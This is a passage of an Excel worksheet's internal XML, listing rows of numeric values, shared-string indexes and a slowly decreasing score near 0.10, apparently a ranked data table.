        <v>31893.0</v>
      </c>
      <c r="B18558" s="2">
        <v>5289324.0</v>
      </c>
      <c r="C18558" s="2" t="s">
        <v>17880</v>
      </c>
      <c r="D18558" s="2">
        <v>1.0</v>
      </c>
      <c r="E18558" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18558" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="18559" ht="15.75" customHeight="1">
      <c r="A18559" s="1">
        <v>19561.0</v>
      </c>
      <c r="B18559" s="2">
        <v>5.6085873E7</v>
      </c>
      <c r="C18559" s="2" t="s">
        <v>17887</v>
      </c>
      <c r="D18559" s="2">
        <v>1.0</v>
      </c>
      <c r="E18559" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18559" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="18560" ht="15.75" customHeight="1">
      <c r="A18560" s="1">
        <v>25309.0</v>
      </c>
      <c r="B18560" s="2">
        <v>1.3426884E7</v>
      </c>
      <c r="C18560" s="2" t="s">
        <v>17888</v>
      </c>
      <c r="D18560" s="2">
        <v>1.0</v>
      </c>
      <c r="E18560" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18560" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="18561" ht="15.75" customHeight="1">
      <c r="A18561" s="1">
        <v>33151.0</v>
      </c>
      <c r="B18561" s="2">
        <v>7073032.0</v>
      </c>
      <c r="C18561" s="2" t="s">
        <v>17889</v>
      </c>
      <c r="D18561" s="2">
        <v>1.0</v>
      </c>
      <c r="E18561" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18561" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="18562" ht="15.75" customHeight="1">
      <c r="A18562" s="1">
        <v>6745.0</v>
      </c>
      <c r="B18562" s="2">
        <v>4.9377287E7</v>
      </c>
      <c r="C18562" s="2" t="s">
        <v>17890</v>
      </c>
      <c r="D18562" s="2">
        <v>1.0</v>
      </c>
      <c r="E18562" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18562" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="18563" ht="15.75" customHeight="1">
      <c r="A18563" s="1">
        <v>7110.0</v>
      </c>
      <c r="B18563" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C18563" s="2" t="s">
        <v>17891</v>
      </c>
      <c r="D18563" s="2">
        <v>1.0</v>
      </c>
      <c r="E18563" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18563" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="18564" ht="15.75" customHeight="1">
      <c r="A18564" s="1">
        <v>19995.0</v>
      </c>
      <c r="B18564" s="2">
        <v>5.76743E7</v>
      </c>
      <c r="C18564" s="2" t="s">
        <v>17892</v>
      </c>
      <c r="D18564" s="2">
        <v>1.0</v>
      </c>
      <c r="E18564" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18564" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="18565" ht="15.75" customHeight="1">
      <c r="A18565" s="1">
        <v>32852.0</v>
      </c>
      <c r="B18565" s="2">
        <v>6255575.0</v>
      </c>
      <c r="C18565" s="2" t="s">
        <v>17893</v>
      </c>
      <c r="D18565" s="2">
        <v>1.0</v>
      </c>
      <c r="E18565" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18565" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="18566" ht="15.75" customHeight="1">
      <c r="A18566" s="1">
        <v>10868.0</v>
      </c>
      <c r="B18566" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C18566" s="2" t="s">
        <v>17894</v>
      </c>
      <c r="D18566" s="2">
        <v>1.0</v>
      </c>
      <c r="E18566" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18566" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="18567" ht="15.75" customHeight="1">
      <c r="A18567" s="1">
        <v>22071.0</v>
      </c>
      <c r="B18567" s="2">
        <v>3.0590969E7</v>
      </c>
      <c r="C18567" s="2" t="s">
        <v>17895</v>
      </c>
      <c r="D18567" s="2">
        <v>1.0</v>
      </c>
      <c r="E18567" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18567" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="18568" ht="15.75" customHeight="1">
      <c r="A18568" s="1">
        <v>32235.0</v>
      </c>
      <c r="B18568" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C18568" s="2" t="s">
        <v>17896</v>
      </c>
      <c r="D18568" s="2">
        <v>1.0</v>
      </c>
      <c r="E18568" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18568" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="18569" ht="15.75" customHeight="1">
      <c r="A18569" s="1">
        <v>32578.0</v>
      </c>
      <c r="B18569" s="2">
        <v>5780327.0</v>
      </c>
      <c r="C18569" s="2" t="s">
        <v>17751</v>
      </c>
      <c r="D18569" s="2">
        <v>1.0</v>
      </c>
      <c r="E18569" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18569" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="18570" ht="15.75" customHeight="1">
      <c r="A18570" s="1">
        <v>3345.0</v>
      </c>
      <c r="B18570" s="2">
        <v>3.7743313E7</v>
      </c>
      <c r="C18570" s="2" t="s">
        <v>17897</v>
      </c>
      <c r="D18570" s="2">
        <v>1.0</v>
      </c>
      <c r="E18570" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18570" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="18571" ht="15.75" customHeight="1">
      <c r="A18571" s="1">
        <v>7672.0</v>
      </c>
      <c r="B18571" s="2">
        <v>5.189804E7</v>
      </c>
      <c r="C18571" s="2" t="s">
        <v>17898</v>
      </c>
      <c r="D18571" s="2">
        <v>1.0</v>
      </c>
      <c r="E18571" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18571" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="18572" ht="15.75" customHeight="1">
      <c r="A18572" s="1">
        <v>8309.0</v>
      </c>
      <c r="B18572" s="2">
        <v>5.3604959E7</v>
      </c>
      <c r="C18572" s="2" t="s">
        <v>17899</v>
      </c>
      <c r="D18572" s="2">
        <v>1.0</v>
      </c>
      <c r="E18572" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18572" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="18573" ht="15.75" customHeight="1">
      <c r="A18573" s="1">
        <v>24213.0</v>
      </c>
      <c r="B18573" s="2">
        <v>1.0398571E7</v>
      </c>
      <c r="C18573" s="2" t="s">
        <v>1867</v>
      </c>
      <c r="D18573" s="2">
        <v>1.0</v>
      </c>
      <c r="E18573" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18573" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="18574" ht="15.75" customHeight="1">
      <c r="A18574" s="1">
        <v>28553.0</v>
      </c>
      <c r="B18574" s="2">
        <v>2.6861579E7</v>
      </c>
      <c r="C18574" s="2" t="s">
        <v>17900</v>
      </c>
      <c r="D18574" s="2">
        <v>1.0</v>
      </c>
      <c r="E18574" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18574" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="18575" ht="15.75" customHeight="1">
      <c r="A18575" s="1">
        <v>29737.0</v>
      </c>
      <c r="B18575" s="2">
        <v>3.4577458E7</v>
      </c>
      <c r="C18575" s="2" t="s">
        <v>17901</v>
      </c>
      <c r="D18575" s="2">
        <v>1.0</v>
      </c>
      <c r="E18575" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18575" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="18576" ht="15.75" customHeight="1">
      <c r="A18576" s="1">
        <v>7153.0</v>
      </c>
      <c r="B18576" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C18576" s="2" t="s">
        <v>17902</v>
      </c>
      <c r="D18576" s="2">
        <v>1.0</v>
      </c>
      <c r="E18576" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18576" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="18577" ht="15.75" customHeight="1">
      <c r="A18577" s="1">
        <v>12584.0</v>
      </c>
      <c r="B18577" s="2">
        <v>3.0033345E7</v>
      </c>
      <c r="C18577" s="2" t="s">
        <v>17903</v>
      </c>
      <c r="D18577" s="2">
        <v>1.0</v>
      </c>
      <c r="E18577" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18577" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="18578" ht="15.75" customHeight="1">
      <c r="A18578" s="1">
        <v>16492.0</v>
      </c>
      <c r="B18578" s="2">
        <v>4.655647E7</v>
      </c>
      <c r="C18578" s="2" t="s">
        <v>17904</v>
      </c>
      <c r="D18578" s="2">
        <v>1.0</v>
      </c>
      <c r="E18578" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18578" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="18579" ht="15.75" customHeight="1">
      <c r="A18579" s="1">
        <v>25154.0</v>
      </c>
      <c r="B18579" s="2">
        <v>1.3064207E7</v>
      </c>
      <c r="C18579" s="2" t="s">
        <v>17905</v>
      </c>
      <c r="D18579" s="2">
        <v>1.0</v>
      </c>
      <c r="E18579" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18579" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="18580" ht="15.75" customHeight="1">
      <c r="A18580" s="1">
        <v>26773.0</v>
      </c>
      <c r="B18580" s="2">
        <v>1.8488898E7</v>
      </c>
      <c r="C18580" s="2" t="s">
        <v>17906</v>
      </c>
      <c r="D18580" s="2">
        <v>1.0</v>
      </c>
      <c r="E18580" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18580" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="18581" ht="15.75" customHeight="1">
      <c r="A18581" s="1">
        <v>27708.0</v>
      </c>
      <c r="B18581" s="2">
        <v>2.3043535E7</v>
      </c>
      <c r="C18581" s="2" t="s">
        <v>17907</v>
      </c>
      <c r="D18581" s="2">
        <v>1.0</v>
      </c>
      <c r="E18581" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18581" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="18582" ht="15.75" customHeight="1">
      <c r="A18582" s="1">
        <v>34181.0</v>
      </c>
      <c r="B18582" s="2">
        <v>9939900.0</v>
      </c>
      <c r="C18582" s="2" t="s">
        <v>17908</v>
      </c>
      <c r="D18582" s="2">
        <v>1.0</v>
      </c>
      <c r="E18582" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18582" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="18583" ht="15.75" customHeight="1">
      <c r="A18583" s="1">
        <v>4476.0</v>
      </c>
      <c r="B18583" s="2">
        <v>4.2483084E7</v>
      </c>
      <c r="C18583" s="2" t="s">
        <v>17909</v>
      </c>
      <c r="D18583" s="2">
        <v>1.0</v>
      </c>
      <c r="E18583" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18583" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="18584" ht="15.75" customHeight="1">
      <c r="A18584" s="1">
        <v>6102.0</v>
      </c>
      <c r="B18584" s="2">
        <v>4.7714319E7</v>
      </c>
      <c r="C18584" s="2" t="s">
        <v>17910</v>
      </c>
      <c r="D18584" s="2">
        <v>1.0</v>
      </c>
      <c r="E18584" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18584" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="18585" ht="15.75" customHeight="1">
      <c r="A18585" s="1">
        <v>11477.0</v>
      </c>
      <c r="B18585" s="2">
        <v>2.1967865E7</v>
      </c>
      <c r="C18585" s="2" t="s">
        <v>17911</v>
      </c>
      <c r="D18585" s="2">
        <v>1.0</v>
      </c>
      <c r="E18585" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18585" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="18586" ht="15.75" customHeight="1">
      <c r="A18586" s="1">
        <v>17746.0</v>
      </c>
      <c r="B18586" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C18586" s="2" t="s">
        <v>17912</v>
      </c>
      <c r="D18586" s="2">
        <v>1.0</v>
      </c>
      <c r="E18586" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18586" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="18587" ht="15.75" customHeight="1">
      <c r="A18587" s="1">
        <v>17972.0</v>
      </c>
      <c r="B18587" s="2">
        <v>5.1359725E7</v>
      </c>
      <c r="C18587" s="2" t="s">
        <v>17913</v>
      </c>
      <c r="D18587" s="2">
        <v>1.0</v>
      </c>
      <c r="E18587" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18587" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="18588" ht="15.75" customHeight="1">
      <c r="A18588" s="1">
        <v>24032.0</v>
      </c>
      <c r="B18588" s="2">
        <v>9438333.0</v>
      </c>
      <c r="C18588" s="2" t="s">
        <v>17178</v>
      </c>
      <c r="D18588" s="2">
        <v>1.0</v>
      </c>
      <c r="E18588" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18588" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="18589" ht="15.75" customHeight="1">
      <c r="A18589" s="1">
        <v>24439.0</v>
      </c>
      <c r="B18589" s="2">
        <v>1.0894565E7</v>
      </c>
      <c r="C18589" s="2" t="s">
        <v>17914</v>
      </c>
      <c r="D18589" s="2">
        <v>1.0</v>
      </c>
      <c r="E18589" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18589" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="18590" ht="15.75" customHeight="1">
      <c r="A18590" s="1">
        <v>33585.0</v>
      </c>
      <c r="B18590" s="2">
        <v>8311613.0</v>
      </c>
      <c r="C18590" s="2" t="s">
        <v>17915</v>
      </c>
      <c r="D18590" s="2">
        <v>1.0</v>
      </c>
      <c r="E18590" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18590" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="18591" ht="15.75" customHeight="1">
      <c r="A18591" s="1">
        <v>4079.0</v>
      </c>
      <c r="B18591" s="2">
        <v>4.1187036E7</v>
      </c>
      <c r="C18591" s="2" t="s">
        <v>17916</v>
      </c>
      <c r="D18591" s="2">
        <v>1.0</v>
      </c>
      <c r="E18591" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18591" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="18592" ht="15.75" customHeight="1">
      <c r="A18592" s="1">
        <v>13080.0</v>
      </c>
      <c r="B18592" s="2">
        <v>3.3358399E7</v>
      </c>
      <c r="C18592" s="2" t="s">
        <v>17917</v>
      </c>
      <c r="D18592" s="2">
        <v>1.0</v>
      </c>
      <c r="E18592" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18592" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="18593" ht="15.75" customHeight="1">
      <c r="A18593" s="1">
        <v>24425.0</v>
      </c>
      <c r="B18593" s="2">
        <v>1.0851147E7</v>
      </c>
      <c r="C18593" s="2" t="s">
        <v>17918</v>
      </c>
      <c r="D18593" s="2">
        <v>1.0</v>
      </c>
      <c r="E18593" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18593" s="2">
        <v>0.1030465949820789</v>
      </c>
    </row>
    <row r="18594" ht="15.75" customHeight="1">
      <c r="A18594" s="1">
        <v>7339.0</v>
      </c>
      <c r="B18594" s="2">
        <v>5.0966078E7</v>
      </c>
      <c r="C18594" s="2" t="s">
        <v>17919</v>
      </c>
      <c r="D18594" s="2">
        <v>1.0</v>
      </c>
      <c r="E18594" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18594" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18595" ht="15.75" customHeight="1">
      <c r="A18595" s="1">
        <v>7666.0</v>
      </c>
      <c r="B18595" s="2">
        <v>5.1847382E7</v>
      </c>
      <c r="C18595" s="2" t="s">
        <v>17920</v>
      </c>
      <c r="D18595" s="2">
        <v>1.0</v>
      </c>
      <c r="E18595" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18595" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18596" ht="15.75" customHeight="1">
      <c r="A18596" s="1">
        <v>9682.0</v>
      </c>
      <c r="B18596" s="2">
        <v>5.6332237E7</v>
      </c>
      <c r="C18596" s="2" t="s">
        <v>17921</v>
      </c>
      <c r="D18596" s="2">
        <v>1.0</v>
      </c>
      <c r="E18596" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18596" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18597" ht="15.75" customHeight="1">
      <c r="A18597" s="1">
        <v>11530.0</v>
      </c>
      <c r="B18597" s="2">
        <v>2251719.0</v>
      </c>
      <c r="C18597" s="2" t="s">
        <v>17922</v>
      </c>
      <c r="D18597" s="2">
        <v>1.0</v>
      </c>
      <c r="E18597" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18597" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18598" ht="15.75" customHeight="1">
      <c r="A18598" s="1">
        <v>12850.0</v>
      </c>
      <c r="B18598" s="2">
        <v>3.177474E7</v>
      </c>
      <c r="C18598" s="2" t="s">
        <v>17923</v>
      </c>
      <c r="D18598" s="2">
        <v>1.0</v>
      </c>
      <c r="E18598" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18598" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18599" ht="15.75" customHeight="1">
      <c r="A18599" s="1">
        <v>15332.0</v>
      </c>
      <c r="B18599" s="2">
        <v>4.2561407E7</v>
      </c>
      <c r="C18599" s="2" t="s">
        <v>17924</v>
      </c>
      <c r="D18599" s="2">
        <v>1.0</v>
      </c>
      <c r="E18599" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18599" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18600" ht="15.75" customHeight="1">
      <c r="A18600" s="1">
        <v>16999.0</v>
      </c>
      <c r="B18600" s="2">
        <v>4.8395748E7</v>
      </c>
      <c r="C18600" s="2" t="s">
        <v>17925</v>
      </c>
      <c r="D18600" s="2">
        <v>1.0</v>
      </c>
      <c r="E18600" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18600" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18601" ht="15.75" customHeight="1">
      <c r="A18601" s="1">
        <v>19053.0</v>
      </c>
      <c r="B18601" s="2">
        <v>5.4578424E7</v>
      </c>
      <c r="C18601" s="2" t="s">
        <v>17926</v>
      </c>
      <c r="D18601" s="2">
        <v>1.0</v>
      </c>
      <c r="E18601" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18601" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18602" ht="15.75" customHeight="1">
      <c r="A18602" s="1">
        <v>20323.0</v>
      </c>
      <c r="B18602" s="2">
        <v>1.1478974E7</v>
      </c>
      <c r="C18602" s="2" t="s">
        <v>17927</v>
      </c>
      <c r="D18602" s="2">
        <v>1.0</v>
      </c>
      <c r="E18602" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18602" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18603" ht="15.75" customHeight="1">
      <c r="A18603" s="1">
        <v>22671.0</v>
      </c>
      <c r="B18603" s="2">
        <v>4.1581087E7</v>
      </c>
      <c r="C18603" s="2" t="s">
        <v>17928</v>
      </c>
      <c r="D18603" s="2">
        <v>1.0</v>
      </c>
      <c r="E18603" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18603" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18604" ht="15.75" customHeight="1">
      <c r="A18604" s="1">
        <v>23119.0</v>
      </c>
      <c r="B18604" s="2">
        <v>5128685.0</v>
      </c>
      <c r="C18604" s="2" t="s">
        <v>17929</v>
      </c>
      <c r="D18604" s="2">
        <v>1.0</v>
      </c>
      <c r="E18604" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18604" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18605" ht="15.75" customHeight="1">
      <c r="A18605" s="1">
        <v>25512.0</v>
      </c>
      <c r="B18605" s="2">
        <v>1.4164413E7</v>
      </c>
      <c r="C18605" s="2" t="s">
        <v>17930</v>
      </c>
      <c r="D18605" s="2">
        <v>1.0</v>
      </c>
      <c r="E18605" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18605" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18606" ht="15.75" customHeight="1">
      <c r="A18606" s="1">
        <v>25982.0</v>
      </c>
      <c r="B18606" s="2">
        <v>1.5307323E7</v>
      </c>
      <c r="C18606" s="2" t="s">
        <v>17931</v>
      </c>
      <c r="D18606" s="2">
        <v>1.0</v>
      </c>
      <c r="E18606" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18606" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18607" ht="15.75" customHeight="1">
      <c r="A18607" s="1">
        <v>27341.0</v>
      </c>
      <c r="B18607" s="2">
        <v>2.1456103E7</v>
      </c>
      <c r="C18607" s="2" t="s">
        <v>17932</v>
      </c>
      <c r="D18607" s="2">
        <v>1.0</v>
      </c>
      <c r="E18607" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18607" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18608" ht="15.75" customHeight="1">
      <c r="A18608" s="1">
        <v>30637.0</v>
      </c>
      <c r="B18608" s="2">
        <v>4.1581086E7</v>
      </c>
      <c r="C18608" s="2" t="s">
        <v>17933</v>
      </c>
      <c r="D18608" s="2">
        <v>1.0</v>
      </c>
      <c r="E18608" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18608" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18609" ht="15.75" customHeight="1">
      <c r="A18609" s="1">
        <v>31583.0</v>
      </c>
      <c r="B18609" s="2">
        <v>5128684.0</v>
      </c>
      <c r="C18609" s="2" t="s">
        <v>17929</v>
      </c>
      <c r="D18609" s="2">
        <v>1.0</v>
      </c>
      <c r="E18609" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18609" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18610" ht="15.75" customHeight="1">
      <c r="A18610" s="1">
        <v>32484.0</v>
      </c>
      <c r="B18610" s="2">
        <v>5.7000339E7</v>
      </c>
      <c r="C18610" s="2" t="s">
        <v>17934</v>
      </c>
      <c r="D18610" s="2">
        <v>1.0</v>
      </c>
      <c r="E18610" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18610" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18611" ht="15.75" customHeight="1">
      <c r="A18611" s="1">
        <v>32499.0</v>
      </c>
      <c r="B18611" s="2">
        <v>5.7090817E7</v>
      </c>
      <c r="C18611" s="2" t="s">
        <v>17935</v>
      </c>
      <c r="D18611" s="2">
        <v>1.0</v>
      </c>
      <c r="E18611" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18611" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="18612" ht="15.75" customHeight="1">
      <c r="A18612" s="1">
        <v>30620.0</v>
      </c>
      <c r="B18612" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C18612" s="2" t="s">
        <v>17936</v>
      </c>
      <c r="D18612" s="2">
        <v>1.0</v>
      </c>
      <c r="E18612" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18612" s="2">
        <v>0.1027777777777777</v>
      </c>
    </row>
    <row r="18613" ht="15.75" customHeight="1">
      <c r="A18613" s="1">
        <v>32594.0</v>
      </c>
      <c r="B18613" s="2">
        <v>5802568.0</v>
      </c>
      <c r="C18613" s="2" t="s">
        <v>17937</v>
      </c>
      <c r="D18613" s="2">
        <v>1.0</v>
      </c>
      <c r="E18613" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18613" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="18614" ht="15.75" customHeight="1">
      <c r="A18614" s="1">
        <v>11611.0</v>
      </c>
      <c r="B18614" s="2">
        <v>2.3039864E7</v>
      </c>
      <c r="C18614" s="2" t="s">
        <v>17938</v>
      </c>
      <c r="D18614" s="2">
        <v>1.0</v>
      </c>
      <c r="E18614" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18614" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="18615" ht="15.75" customHeight="1">
      <c r="A18615" s="1">
        <v>19196.0</v>
      </c>
      <c r="B18615" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C18615" s="2" t="s">
        <v>17939</v>
      </c>
      <c r="D18615" s="2">
        <v>1.0</v>
      </c>
      <c r="E18615" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18615" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="18616" ht="15.75" customHeight="1">
      <c r="A18616" s="1">
        <v>29622.0</v>
      </c>
      <c r="B18616" s="2">
        <v>3.3660926E7</v>
      </c>
      <c r="C18616" s="2" t="s">
        <v>17940</v>
      </c>
      <c r="D18616" s="2">
        <v>1.0</v>
      </c>
      <c r="E18616" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18616" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="18617" ht="15.75" customHeight="1">
      <c r="A18617" s="1">
        <v>1510.0</v>
      </c>
      <c r="B18617" s="2">
        <v>2.7305636E7</v>
      </c>
      <c r="C18617" s="2" t="s">
        <v>17941</v>
      </c>
      <c r="D18617" s="2">
        <v>1.0</v>
      </c>
      <c r="E18617" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18617" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="18618" ht="15.75" customHeight="1">
      <c r="A18618" s="1">
        <v>8614.0</v>
      </c>
      <c r="B18618" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C18618" s="2" t="s">
        <v>17942</v>
      </c>
      <c r="D18618" s="2">
        <v>1.0</v>
      </c>
      <c r="E18618" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18618" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="18619" ht="15.75" customHeight="1">
      <c r="A18619" s="1">
        <v>13442.0</v>
      </c>
      <c r="B18619" s="2">
        <v>3.5136718E7</v>
      </c>
      <c r="C18619" s="2" t="s">
        <v>17943</v>
      </c>
      <c r="D18619" s="2">
        <v>1.0</v>
      </c>
      <c r="E18619" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18619" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="18620" ht="15.75" customHeight="1">
      <c r="A18620" s="1">
        <v>14299.0</v>
      </c>
      <c r="B18620" s="2">
        <v>3.857265E7</v>
      </c>
      <c r="C18620" s="2" t="s">
        <v>17944</v>
      </c>
      <c r="D18620" s="2">
        <v>1.0</v>
      </c>
      <c r="E18620" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18620" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="18621" ht="15.75" customHeight="1">
      <c r="A18621" s="1">
        <v>28135.0</v>
      </c>
      <c r="B18621" s="2">
        <v>2.4781083E7</v>
      </c>
      <c r="C18621" s="2" t="s">
        <v>17945</v>
      </c>
      <c r="D18621" s="2">
        <v>1.0</v>
      </c>
      <c r="E18621" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18621" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="18622" ht="15.75" customHeight="1">
      <c r="A18622" s="1">
        <v>28730.0</v>
      </c>
      <c r="B18622" s="2">
        <v>2.7969765E7</v>
      </c>
      <c r="C18622" s="2" t="s">
        <v>17946</v>
      </c>
      <c r="D18622" s="2">
        <v>1.0</v>
      </c>
      <c r="E18622" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18622" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="18623" ht="15.75" customHeight="1">
      <c r="A18623" s="1">
        <v>7971.0</v>
      </c>
      <c r="B18623" s="2">
        <v>5.2696347E7</v>
      </c>
      <c r="C18623" s="2" t="s">
        <v>17947</v>
      </c>
      <c r="D18623" s="2">
        <v>1.0</v>
      </c>
      <c r="E18623" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18623" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="18624" ht="15.75" customHeight="1">
      <c r="A18624" s="1">
        <v>8314.0</v>
      </c>
      <c r="B18624" s="2">
        <v>5.3621408E7</v>
      </c>
      <c r="C18624" s="2" t="s">
        <v>17948</v>
      </c>
      <c r="D18624" s="2">
        <v>1.0</v>
      </c>
      <c r="E18624" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18624" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="18625" ht="15.75" customHeight="1">
      <c r="A18625" s="1">
        <v>8783.0</v>
      </c>
